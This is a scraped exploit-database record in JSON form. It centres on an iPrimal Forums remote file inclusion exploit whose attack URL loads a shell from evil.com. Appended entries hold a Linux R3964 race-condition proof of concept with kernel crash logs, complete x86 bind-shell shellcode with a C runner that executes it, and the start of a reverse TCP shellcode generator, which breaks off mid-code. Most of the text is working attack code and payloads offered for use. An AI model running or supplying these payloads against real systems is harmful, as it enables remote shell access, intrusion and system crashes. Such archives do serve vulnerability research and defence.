ID 1337DAY-ID-1134
Type zdt
Reporter Bl0od3r
Modified 2006-11-08T00:00:00
Description
Exploit for unknown platform in category web applications
==================================================================
iPrimal Forums (admin/index.php) Remote File Include Vulnerability
==================================================================
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
iPrimal Forums Remote File Inclusion
Found by Bl0od3r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code: #line 126-129
.....
if($_GET['p'] == ''){
echo 'Please select an item from the menu above.';
}else{
include($_GET['p'].'.php');
.....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected File:
/admin/index.php =]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability:
http://host.com/admin/index.php?p=http://evil.com/shell.txt?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz:evilcookie,eddy14,matrix_killer
# 0day.today [2018-01-02] #
{"hash": "95d210d7c388065a35279ed7ab8ceb3e8666d44b6d03fc910931c82fa8c106cb", "id": "1337DAY-ID-1134", "lastseen": "2018-01-02T11:26:40", "viewCount": 23, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "bac75cfe8f8f5989e6c056a14d851a39", "key": "href"}, {"hash": "3f0277ba7385e43bfcf8ef31cb8790b8", "key": "modified"}, {"hash": "3f0277ba7385e43bfcf8ef31cb8790b8", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "bafa6d7684416e40fbade4f7fd17604a", "key": "reporter"}, {"hash": "8376f2326242f0939f6425b0f683b88a", "key": "sourceData"}, {"hash": "e825c276cd92327a7569480dbac8f87e", "key": "sourceHref"}, {"hash": "ac4703624f7da219c29b310c427c95e5", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2018-01-02T11:26:40"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-32582", "1337DAY-ID-31003", "1337DAY-ID-31002", "1337DAY-ID-30541", "1337DAY-ID-27847", "1337DAY-ID-23696", "1337DAY-ID-23495", "1337DAY-ID-21272", "1337DAY-ID-19928", "1337DAY-ID-18221"]}, {"type": "exploitdb", "idList": ["EDB-ID:44846"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148068", "PACKETSTORM:112542"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113200", "OPENVAS:1361412562310113201", "OPENVAS:1361412562310805601"]}, {"type": "nessus", "idList": ["SUSE_SU-2017-1835-1.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:1134", "SECURITYVULNS:DOC:1134"]}], "modified": "2018-01-02T11:26:40"}, "vulnersScore": 1.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/1134", "description": "Exploit for unknown platform in category web applications", "title": "iPrimal Forums (admin/index.php) Remote File Include Vulnerability", "history": [{"bulletin": {"hash": "0427165a36ff3c209661ba9e70a09199c6c1b1c29b56db83bc19289a38b605ad", "id": "1337DAY-ID-1134", "lastseen": "2016-04-19T23:37:53", "enchantments": {"score": {"value": 5.5, "modified": "2016-04-19T23:37:53"}}, "hashmap": [{"hash": "1797368496274b48399f9f6c78775d96", "key": "sourceHref"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "3f0277ba7385e43bfcf8ef31cb8790b8", "key": "published"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8b39b64b11774d96f43a126ca3b8cd7c", "key": "href"}, {"hash": "3f0277ba7385e43bfcf8ef31cb8790b8", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "ac4703624f7da219c29b310c427c95e5", "key": "title"}, {"hash": "bafa6d7684416e40fbade4f7fd17604a", "key": "reporter"}, {"hash": "8293c43267ad11823e9aeefcdfb4ffff", "key": "sourceData"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/1134", "description": "Exploit for unknown platform in category web applications", "viewCount": 10, "title": "iPrimal Forums (admin/index.php) Remote File Include Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==================================================================\r\niPrimal Forums (admin/index.php) Remote File Include Vulnerability\r\n==================================================================\r\n\r\n\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\niPrimal Forums Remote File Inclusion\r\nFound by Bl0od3r\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nVulnerable Code: #line 126-129\r\n.....\r\nif($_GET['p'] == ''){\r\n\r\necho 'Please select an item from the menu above.';\r\n\r\n}else{\r\n\r\ninclude($_GET['p'].'.php');\r\n.....\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nAffected File:\r\n/admin/index.php =]\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nVulnerability:\r\nhttp://host.com/admin/index.php?p=http://evil.com/shell.txt?\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nGreetz:evilcookie,eddy14,matrix_killer\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2006-11-08T00:00:00", "references": [], "reporter": "Bl0od3r", "modified": "2006-11-08T00:00:00", "href": "http://0day.today/exploit/description/1134"}, "lastseen": "2016-04-19T23:37:53", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==================================================================\r\niPrimal Forums (admin/index.php) Remote File Include Vulnerability\r\n==================================================================\r\n\r\n\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\niPrimal Forums Remote File Inclusion\r\nFound by Bl0od3r\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nVulnerable Code: #line 126-129\r\n.....\r\nif($_GET['p'] == ''){\r\n\r\necho 'Please select an item from the menu above.';\r\n\r\n}else{\r\n\r\ninclude($_GET['p'].'.php');\r\n.....\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nAffected File:\r\n/admin/index.php =]\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nVulnerability:\r\nhttp://host.com/admin/index.php?p=http://evil.com/shell.txt?\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nGreetz:evilcookie,eddy14,matrix_killer\r\n\r\n\r\n\n# 0day.today [2018-01-02] #", "published": "2006-11-08T00:00:00", "references": [], "reporter": "Bl0od3r", "modified": "2006-11-08T00:00:00", "href": "https://0day.today/exploit/description/1134"}
{"zdt": [{"lastseen": "2019-04-24T11:58:28", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2019-04-23T00:00:00", "published": "2019-04-23T00:00:00", "id": "1337DAY-ID-32582", "href": "https://0day.today/exploit/description/32582", "title": "Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition Exploit", "type": "zdt", "sourceData": "Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition Exploit\r\n\r\n/*\r\nThe Siemens R3964 line discipline code in drivers/tty/n_r3964.c has a few races\r\naround its ioctl handler; for example, the handler for R3964_ENABLE_SIGNALS\r\njust allocates and deletes elements in a linked list with zero locking.\r\nThis code is reachable by an unprivileged user if the line discipline is enabled\r\nin the kernel config; Ubuntu 18.04, for example, ships this line discipline as a\r\nmodule.\r\n\r\nProof of concept:\r\n\r\n==================================\r\n[email\u00a0protected]:~/r3964$ cat r3964_racer.c\r\n*/\r\n\r\n#define _GNU_SOURCE\r\n#include <pthread.h>\r\n#include <fcntl.h>\r\n#include <sys/ioctl.h>\r\n#include <stdio.h>\r\n#include <err.h>\r\n#include <stdlib.h>\r\n#include <linux/n_r3964.h>\r\n\r\nstatic int ptm_fd, slave_fd;\r\n\r\nstatic void *thread_fn(void *dummy) {\r\n int res;\r\n while (1) {\r\n res = ioctl(slave_fd, R3964_ENABLE_SIGNALS, R3964_SIG_ALL);\r\n printf(\"R3964_ENABLE_SIGNALS: %d\\n\", res);\r\n res = ioctl(slave_fd, R3964_ENABLE_SIGNALS, 0);\r\n printf(\"R3964_ENABLE_SIGNALS: %d\\n\", res);\r\n }\r\n}\r\n\r\nint main(void) {\r\n ptm_fd = getpt();\r\n if (ptm_fd == -1) err(1, \"getpt\");\r\n if (unlockpt(ptm_fd)) err(1, \"unlockpt\");\r\n slave_fd = ioctl(ptm_fd, TIOCGPTPEER, O_RDWR);\r\n if (slave_fd == -1) err(1, \"TIOCGPTPEER\");\r\n\r\n printf(\"-----------------------------------------\\n\");\r\n system(\"ls -l /proc/$PPID/fd\");\r\n printf(\"-----------------------------------------\\n\");\r\n\r\n const int disc_r3964 = N_R3964;\r\n if (ioctl(slave_fd, TIOCSETD, &disc_r3964)) err(1, \"TIOCSETD\");\r\n\r\n pthread_t thread;\r\n if (pthread_create(&thread, NULL, thread_fn, NULL)) errx(1, \"pthread_create\");\r\n\r\n thread_fn(NULL);\r\n\r\n return 0;\r\n}\r\n\r\n/*\r\n[email\u00a0protected]:~/r3964$ gcc -o r3964_racer r3964_racer.c -pthread && ./r3964_racer\r\n[...]\r\n==================================\r\n\r\ndmesg splat:\r\n\r\n==================================\r\n[ 82.646953] r3964: Philips r3964 Driver $Revision: 1.10 $\r\n[ 82.656459] ------------[ cut here ]------------\r\n[ 82.656461] kernel BUG at /build/linux-Y38gIP/linux-4.15.0/mm/slub.c:296!\r\n[ 82.658396] invalid opcode: 0000 [#1] SMP PTI\r\n[ 82.659515] Modules linked in: n_r3964 joydev ipt_MASQUERADE nf_nat_masquerade_ipv4 nf_conntrack_netlink nfnetlink xfrm_user xfrm_algo iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 xt_addrtype iptable_filter xt_conntrack nf_nat nf_conntrack libcrc32c br_netfilter bridge stp llc aufs overlay snd_hda_codec_generic crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep ghash_clmulni_intel snd_pcm snd_seq_midi snd_seq_midi_event pcbc aesni_intel aes_x86_64 snd_rawmidi snd_seq snd_seq_device snd_timer snd crypto_simd glue_helper cryptd input_leds soundcore mac_hid 9pnet_virtio 9pnet serio_raw qemu_fw_cfg sch_fq_codel parport_pc ppdev lp parport ip_tables x_tables autofs4 virtio_gpu ttm floppy drm_kms_helper psmouse syscopyarea sysfillrect sysimgblt fb_sys_fops drm\r\n[ 82.677770] virtio_net i2c_piix4 pata_acpi\r\n[ 82.678849] CPU: 1 PID: 2209 Comm: r3964_racer Not tainted 4.15.0-42-generic #45-Ubuntu\r\n[ 82.680897] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014\r\n[ 82.683098] RIP: 0010:kfree+0x16a/0x180\r\n[ 82.684116] RSP: 0018:ffffb6b381d7fd50 EFLAGS: 00010246\r\n[ 82.685454] RAX: ffff9bb0b4770000 RBX: ffff9bb0b4770000 RCX: ffff9bb0b4770000\r\n[ 82.687285] RDX: 0000000000006e86 RSI: ffff9bb1bfca70a0 RDI: ffff9bb1bb003800\r\n[ 82.689247] RBP: ffffb6b381d7fd68 R08: ffffffffc0511db0 R09: ffffffffc051202c\r\n[ 82.691077] R10: ffffeb8c80d1dc00 R11: 0000000000000000 R12: ffff9bb1b3430e40\r\n[ 82.692906] R13: ffffffffc051202c R14: ffff9bb13b56e800 R15: ffff9bb12d1addd0\r\n[ 82.694726] FS: 00007ff9b92da740(0000) GS:ffff9bb1bfc80000(0000) knlGS:0000000000000000\r\n[ 82.696801] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 82.698421] CR2: 0000558cf9e32ec8 CR3: 00000000a513a005 CR4: 00000000003606e0\r\n[ 82.700259] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\r\n[ 82.702113] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\r\n[ 82.703946] Call Trace:\r\n[ 82.704602] r3964_ioctl+0x27c/0x2b0 [n_r3964]\r\n[ 82.705746] tty_ioctl+0x138/0x8c0\r\n[ 82.706631] ? __wake_up+0x13/0x20\r\n[ 82.707516] do_vfs_ioctl+0xa8/0x630\r\n[ 82.708610] ? vfs_write+0x166/0x1a0\r\n[ 82.709543] SyS_ioctl+0x79/0x90\r\n[ 82.710405] do_syscall_64+0x73/0x130\r\n[ 82.711357] entry_SYSCALL_64_after_hwframe+0x3d/0xa2\r\n[ 82.712659] RIP: 0033:0x7ff9b8bd45d7\r\n[ 82.713680] RSP: 002b:00007fffcd85bcf8 EFLAGS: 00000202 ORIG_RAX: 0000000000000010\r\n[ 82.715617] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff9b8bd45d7\r\n[ 82.717463] RDX: 0000000000000000 RSI: 0000000000005301 RDI: 0000000000000004\r\n[ 82.719411] RBP: 00007fffcd85bd20 R08: 0000000000000000 R09: 0000000000000000\r\n[ 82.721248] R10: 0000000000000000 R11: 0000000000000202 R12: 0000556df58ed820\r\n[ 82.723093] R13: 00007fffcd85be30 R14: 0000000000000000 R15: 0000000000000000\r\n[ 82.724930] Code: c4 80 74 04 41 8b 72 6c 4c 89 d7 e8 61 1c f9 ff eb 86 41 b8 01 00 00 00 48 89 d9 48 89 da 4c 89 d6 e8 8b f6 ff ff e9 6d ff ff ff <0f> 0b 48 8b 3d 6d c5 1c 01 e9 c9 fe ff ff 0f 1f 84 00 00 00 00 \r\n[ 82.729909] RIP: kfree+0x16a/0x180 RSP: ffffb6b381d7fd50\r\n[ 82.731310] ---[ end trace c1cd537c5d2e0b84 ]---\r\n==================================\r\n\r\n\r\nI've also tried this on 5.0-rc2 with KASAN on, which resulted in this splat:\r\n\r\n==================================\r\n[ 69.883056] ==================================================================\r\n[ 69.885163] BUG: KASAN: use-after-free in r3964_ioctl+0x288/0x3c0\r\n[ 69.886855] Read of size 8 at addr ffff8881e0474020 by task r3964_racer/1134\r\n[ 69.888820] \r\n[ 69.889251] CPU: 3 PID: 1134 Comm: r3964_racer Not tainted 5.0.0-rc2 #238\r\n[ 69.891729] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014\r\n[ 69.894535] Call Trace:\r\n[ 69.895223] dump_stack+0x71/0xab\r\n[ 69.896134] ? r3964_ioctl+0x288/0x3c0\r\n[ 69.897181] print_address_description+0x6a/0x270\r\n[ 69.898473] ? r3964_ioctl+0x288/0x3c0\r\n[ 69.899499] ? r3964_ioctl+0x288/0x3c0\r\n[ 69.900534] kasan_report+0x14e/0x192\r\n[ 69.901562] ? r3964_ioctl+0x288/0x3c0\r\n[ 69.902606] r3964_ioctl+0x288/0x3c0\r\n[ 69.903586] tty_ioctl+0x227/0xbd0\r\n[...]\r\n[ 69.917312] do_vfs_ioctl+0x134/0x8f0\r\n[...]\r\n[ 69.926807] ksys_ioctl+0x70/0x80\r\n[ 69.927709] __x64_sys_ioctl+0x3d/0x50\r\n[ 69.928734] do_syscall_64+0x73/0x160\r\n[ 69.929741] entry_SYSCALL_64_after_hwframe+0x44/0xa9\r\n[ 69.931099] RIP: 0033:0x7f6491542dd7\r\n[ 69.932068] Code: 00 00 00 48 8b 05 c1 80 2b 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 91 80 2b 00 f7 d8 64 89 01 48\r\n[ 69.937051] RSP: 002b:00007f6491460f28 EFLAGS: 00000206 ORIG_RAX: 0000000000000010\r\n[ 69.939067] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f6491542dd7\r\n[ 69.940977] RDX: 000000000000000f RSI: 0000000000005301 RDI: 0000000000000004\r\n[ 69.942905] RBP: 00007f6491460f50 R08: 0000000000000000 R09: 0000000000000018\r\n[ 69.944800] R10: 0000000000000064 R11: 0000000000000206 R12: 0000000000000000\r\n[ 69.947600] R13: 00007ffeb17a9b4f R14: 0000000000000000 R15: 00007f6491c42040\r\n[ 69.949491] \r\n[ 69.949923] Allocated by task 1131:\r\n[ 69.950866] __kasan_kmalloc.constprop.8+0xa5/0xd0\r\n[ 69.952147] kmem_cache_alloc_trace+0xfa/0x200\r\n[ 69.953352] r3964_ioctl+0x2e6/0x3c0\r\n[ 69.954333] tty_ioctl+0x227/0xbd0\r\n[ 69.955267] do_vfs_ioctl+0x134/0x8f0\r\n[ 69.956248] ksys_ioctl+0x70/0x80\r\n[ 69.957150] __x64_sys_ioctl+0x3d/0x50\r\n[ 69.958169] do_syscall_64+0x73/0x160\r\n[ 69.959148] entry_SYSCALL_64_after_hwframe+0x44/0xa9\r\n[ 69.960485] \r\n[ 69.960910] Freed by task 1131:\r\n[ 69.961764] __kasan_slab_free+0x135/0x180\r\n[ 69.962851] kfree+0x90/0x1d0\r\n[ 69.963660] r3964_ioctl+0x208/0x3c0\r\n[ 69.964631] tty_ioctl+0x227/0xbd0\r\n[ 69.965564] do_vfs_ioctl+0x134/0x8f0\r\n[ 69.966540] ksys_ioctl+0x70/0x80\r\n[ 69.967424] __x64_sys_ioctl+0x3d/0x50\r\n[ 69.968424] do_syscall_64+0x73/0x160\r\n[ 69.969414] entry_SYSCALL_64_after_hwframe+0x44/0xa9\r\n[ 69.970768] \r\n[ 69.971182] The buggy address belongs to the object at ffff8881e0474008\r\n[ 69.971182] which belongs to the cache kmalloc-64 of size 64\r\n[ 69.974429] The buggy address is located 24 bytes inside of\r\n[ 69.974429] 64-byte region [ffff8881e0474008, ffff8881e0474048)\r\n[ 69.977470] The buggy address belongs to the page:\r\n[ 69.978744] page:ffffea0007811d00 count:1 mapcount:0 mapping:ffff8881e600f740 index:0x0 compound_mapcount: 0\r\n[ 69.981316] flags: 0x17fffc000010200(slab|head)\r\n[ 69.982528] raw: 017fffc000010200 ffffea0007554508 ffffea0007811e08 ffff8881e600f740\r\n[ 69.984722] raw: 0000000000000000 0000000000270027 00000001ffffffff 0000000000000000\r\n[ 69.984723] page dumped because: kasan: bad access detected\r\n[ 69.984724] \r\n[ 69.984725] Memory state around the buggy address:\r\n[ 69.984727] ffff8881e0473f00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\r\n[ 69.984729] ffff8881e0473f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\r\n[ 69.984731] >ffff8881e0474000: fc fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc\r\n[ 69.984732] ^\r\n[ 69.984734] ffff8881e0474080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\r\n[ 69.984736] ffff8881e0474100: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\r\n[ 69.984737] ==================================================================\r\n[ 69.984739] Disabling lock debugging due to kernel taint\r\n[ 69.996233] ==================================================================\r\n==================================\r\n\r\n\r\nI wonder whether it would, in addition to fixing the locking, also make sense to\r\ngate the line discipline on some sort of capability - it seems wrong to me that\r\nthis kind of code is exposed to every user on the system.\r\n*/\n\n# 0day.today [2019-04-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32582"}, {"lastseen": "2018-09-01T16:42:01", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2018-08-30T00:00:00", "published": "2018-08-30T00:00:00", "id": "1337DAY-ID-31002", "href": "https://0day.today/exploit/description/31002", "title": "Linux/x86 - Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode", "type": "zdt", "sourceData": "/*\r\n# Exploit Title: Linux x86 Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode\r\n# Shellcode Author: Kevin Kirsche\r\n# Shellcode Repository: https://github.com/kkirsche/SLAE/tree/master/assignment_1-bind_shell\r\n# Tested on: Shell on Ubuntu 18.04 with gcc 7.3.0 / Connected from Kali 2018.2\r\n \r\n# This shellcode will listen on port 1337 on all of the host's IPv4 and IPv6 addresses and give you /bin/sh\r\n \r\nThis shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:\r\nhttp://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/\r\nStudent ID: SLAE-1134\r\n \r\nCompilation instructions:\r\n gcc -o shellcode shellcode.c -fno-stack-protector -z execstack\r\n \r\nCommented NASM:\r\nglobal _start\r\n \r\nsection .text\r\n \r\n_start:\r\n ; socket\r\n ;; cleanup\r\n xor ebx, ebx\r\n ;; arguments\r\n push ebx ; #define IP_PROTO 0\r\n push 0x1 ; #define SOCK_STREAM 1\r\n push 0xa ; #define PF_INET6 10\r\n ;; function\r\n mov ecx, esp ; pointer to args on the stack into ecx\r\n push 0x66\r\n pop eax ; socketcall 0x66 == 102\r\n inc ebx ; #define SYS_SOCKET 1\r\n ;; call\r\n int 0x80\r\n ;; returned data\r\n xchg esi, eax ; sockfd eax -> esi\r\n \r\n ; setsocketopt\r\n ;; cleanup\r\n xor eax, eax\r\n ;; arguments\r\n push eax ; NO = 0x0\r\n mov edx, esp ; get a pointer to the null value\r\n push 0x2 ; sizeof(NO)\r\n push edx ; pointer to NO\r\n push 0x1a ; #define IPV6_V6ONLY 26\r\n push 0x29 ; #define IPPROTO_IPV6\r\n ;; function\r\n mov ecx, esp ; pointer to args on the stack into ecx\r\n mov al, 0x66 ; socketcall 0x66 == 102\r\n mov bl, 0xe ; #define SYS_SETSOCKOPT 14\r\n ;; call\r\n int 0x80\r\n \r\n ; bind ipv4\r\n ;; cleanup\r\n xor edx, edx\r\n ;; v4lhost struct\r\n push edx ; #define INADDR_ANY 0\r\n push word 0x3905 ; port 1337 in big endian format\r\n push 0x2 ; #define AF_INET 2\r\n ;; arguments\r\n mov ecx, esp ; pointer to v4lhost struct arguments\r\n push 0x10 ; sizeof v4lhost\r\n push ecx ; pointer v4lhost\r\n push esi ; push sockfd onto stack\r\n ;; function\r\n mov ecx, esp ; argument pointer into ecx\r\n mov bl, 0x2 ; #define SYS_BIND 2\r\n mov al, 0x66 ; socketcall 0x66 == 102\r\n ;; call\r\n int 0x80\r\n \r\n ; bind ipv6\r\n ;; cleanup\r\n xor eax, eax\r\n ;; v6lhost struct\r\n push dword eax ; v6_host.sin6_addr\r\n push dword eax\r\n push dword eax\r\n push dword eax\r\n push dword eax\r\n push word 0x3905 ; port 1337\r\n push word 0x0a ; PF_INET6\r\n ;; arguments\r\n mov ecx, esp ; pointer to struct into ecx\r\n push 0x1c ; sizeof struct\r\n push ecx ; pointer to struct\r\n push esi ; sockfd\r\n ;; function\r\n mov ecx, esp ; arguments into register\r\n mov bl, 0x2 ; #define SYS_BIND 2\r\n mov al, 0x66 ; socketcall 0x66 == 102\r\n ;; call\r\n int 0x80\r\n \r\n ; listen\r\n ;; arguments\r\n push byte 0x2 ; queuelimit = 2\r\n push esi ; sockfd\r\n ;; function\r\n mov ecx, esp ; pointer to args into ecx\r\n mov bl, 0x4 ; #define SYS_LISTEN 4\r\n mov al, 0x66 ; socketcall 0x66 == 102\r\n ;; call\r\n int 0x80\r\n \r\n ; accept\r\n ;; cleanup\r\n xor ebx, ebx\r\n ;;arguments\r\n push ebx ; push NULL\r\n push ebx ; push NULL\r\n push esi ; sockfd\r\n ;; function\r\n mov ecx, esp ; pointer to args into ecx\r\n mov bl, 0x5 ; #define SYS_ACCEPT 5\r\n mov al, 0x66 ; socketcall 0x66 == 102\r\n ;; call\r\n int 0x80\r\n ;; returned data\r\n xchg ebx, eax ; ebx holds the new sockfd that we accepted\r\n \r\n ; dup file descriptor\r\n ;; setup counters\r\n sub ecx, ecx ; zero out ecx\r\n mov cl, 0x2 ; create a counter\r\n ;; loop\r\nduploop:\r\n mov al, 0x3f ; SYS_DUP2 syscall\r\n int 0x80 ; call SYS_DUP2\r\n dec ecx ; decrement loop counter\r\n jns duploop ; as long as SF is not set, keep looping\r\n \r\n ; execve\r\n ;; cleanup\r\n xor edx, edx\r\n ;; command to run\r\n push edx ; NULL string terminator\r\n push 0x68732f2f ; hs//\r\n push 0x6e69622f ; nib/\r\n ;; arguments\r\n mov ebx, esp ; pointer to args into ebx\r\n push edx ; null ARGV\r\n push ebx ; command to run\r\n ;; function\r\n mov ecx, esp\r\n mov al, 0x0b ; execve systemcall\r\n int 0x80\r\n*/\r\n#include <stdio.h>\r\n#include <string.h>\r\n \r\nunsigned char code[] = \"\\x31\\xdb\\x53\\x6a\\x01\\x6a\\x0a\\x89\\xe1\\x6a\\x66\\x58\\x43\"\r\n \"\\xcd\\x80\\x96\\x31\\xc0\\x50\\x89\\xe2\\x6a\\x02\\x52\\x6a\\x1a\\x6a\\x29\\x89\\xe1\\xb0\"\r\n \"\\x66\\xb3\\x0e\\xcd\\x80\\x31\\xd2\\x52\\x66\\x68\\x05\\x39\\x6a\\x02\\x89\\xe1\\x6a\\x10\"\r\n \"\\x51\\x56\\x89\\xe1\\xb3\\x02\\xb0\\x66\\xcd\\x80\\x31\\xc0\\x50\\x50\\x50\\x50\\x50\\x66\"\r\n \"\\x68\\x05\\x39\\x66\\x6a\\x0a\\x89\\xe1\\x6a\\x1c\\x51\\x56\\x89\\xe1\\xb3\\x02\\xb0\\x66\"\r\n \"\\xcd\\x80\\x6a\\x02\\x56\\x89\\xe1\\xb3\\x04\\xb0\\x66\\xcd\\x80\\x31\\xdb\\x53\\x53\\x56\"\r\n \"\\x89\\xe1\\xb3\\x05\\xb0\\x66\\xcd\\x80\\x93\\x29\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\"\r\n \"\\x79\\xf9\\x31\\xd2\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\"\r\n \"\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";\r\n \r\n \r\nint main() {\r\n // pollute the registers\r\n asm(\"mov $0x78975432, %eax\\n\\t\"\r\n \"mov $0x17645589, %ecx\\n\\t\"\r\n \"mov $0x23149875, %edx\\n\\t\");\r\n \r\n // begin shellcode\r\n printf(\"Shellcode Length: %d\\n\", strlen(code));\r\n // execute our shellcode\r\n int (*ret)() = (int(*)())code;\r\n ret();\r\n}\n\n# 0day.today [2018-09-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31002"}, {"lastseen": "2018-09-01T16:42:26", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2018-08-30T00:00:00", "published": "2018-08-30T00:00:00", "id": "1337DAY-ID-31003", "href": "https://0day.today/exploit/description/31003", "title": "Linux/x86 - IPv6 Reverse TCP Shellcode Generator (94 bytes)", "type": "zdt", "sourceData": "#!/usr/bin/env python3\r\n# Exploit Title: Linux x86 IPv6 Reverse TCP Shellcode Generator (94 bytes)\r\n# Shellcode Author: Kevin Kirsche\r\n# Shellcode Repository: https://github.com/kkirsche/SLAE/tree/master/assignment_2-reverse_shell\r\n# Tested on: Shell on Ubuntu 18.04 with gcc 7.3.0 / Connecting to Kali 2018.2\r\n \r\n# This shellcode will connect to fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509 on port 1337 and give you /bin/sh\r\n \r\n#This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:\r\n#http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/\r\n#Student ID: SLAE-1134\r\n \r\nfrom argparse import ArgumentParser\r\nfrom ipaddress import ip_address\r\nimport sys\r\n \r\nsc = (\"\\\\x31\\\\xdb\\\\x53\\\\x43\\\\x53\\\\x6a\\\\x0a\\\\x89\\\\xe1\\\\x6a\\\\x66\\\\x58\\\\xcd\\\\x80\"\r\n \"\\\\x96\\\\x99\\\\x52\\\\x68{ipv6_fourth_octet}\\\\x68{ipv6_third_octet}\\\\x68\"\r\n \"{ipv6_second_octet}\\\\x68{ipv6_first_octet}\\\\x52\\\\x66\\\\x68{port}\"\r\n \"\\\\x66\\\\x6a\\\\x0a\\\\x89\\\\xe1\\\\x6a\\\\x1c\\\\x51\\\\x56\\\\x89\\\\xe1\\\\x43\\\\x43\\\\x6a\"\r\n \"\\\\x66\\\\x58\\\\xcd\\\\x80\\\\x87\\\\xde\\\\x29\\\\xc9\\\\xb1\\\\x02\\\\xb0\\\\x3f\\\\xcd\\\\x80\"\r\n \"\\\\x49\\\\x79\\\\xf9\\\\x31\\\\xd2\\\\x52\\\\x68\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x68\\\\x2f\\\\x62\"\r\n \"\\\\x69\\\\x6e\\\\x89\\\\xd1\\\\x89\\\\xe3\\\\xb0\\\\x0b\\\\xcd\\\\x80\")\r\n \r\nif __name__ == '__main__':\r\n parser = ArgumentParser(description=(\"Dual Network Stack Bind Shell \"\r\n \"Generator\"))\r\n parser.add_argument('ip_address', type=str, nargs='?', default='fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509',\r\n help='The IP address to connect to (default 